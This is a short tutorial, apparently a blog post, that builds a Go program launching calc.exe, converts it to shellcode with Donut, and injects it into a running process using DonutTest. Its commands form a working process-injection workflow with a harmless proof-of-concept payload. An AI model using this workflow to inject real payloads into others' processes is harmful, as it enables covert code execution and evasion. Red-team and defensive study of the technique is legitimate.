With release of Go1.15 a new "buildmode" flag has been released. -buildmode=pie
Lets do a simple demo of converting a go binary to shellcode and injecting it to other processes
I am going to build a simple golang program which launches calc
calc.gopackage main​import("fmt""os/exec")​func main(){c := exec.Command("calc.exe")​if err := c.Run(); err != nil {fmt.Println("Error: ", err)}}
Now lets build the program. I am using Windows 10 amd64 machine. You may need to specify other parameters if you are cross compiling
go build -buildmode=pie -o calc.exe calc.go
The command will generate a static binary calc.exe.
Here we will use TheWover's Donut to convert the calc.exe to shellcode. The command is quite simple
donut.exe calc.exe -o calc.bin
​DonutTest is a subproject of Donut repo. DonutTest provides a test harness to test your generated Shellcode.
To use our calc.bin inside donut test we need to convert it into base64
[Convert]::ToBase64String([IO.File]::ReadAllBytes("./calc.bin")) | clip
Now paste the shellcode in DonutTest and compile. Your program should run as expected and you should see a calc pop
DonutTest.exe <pid>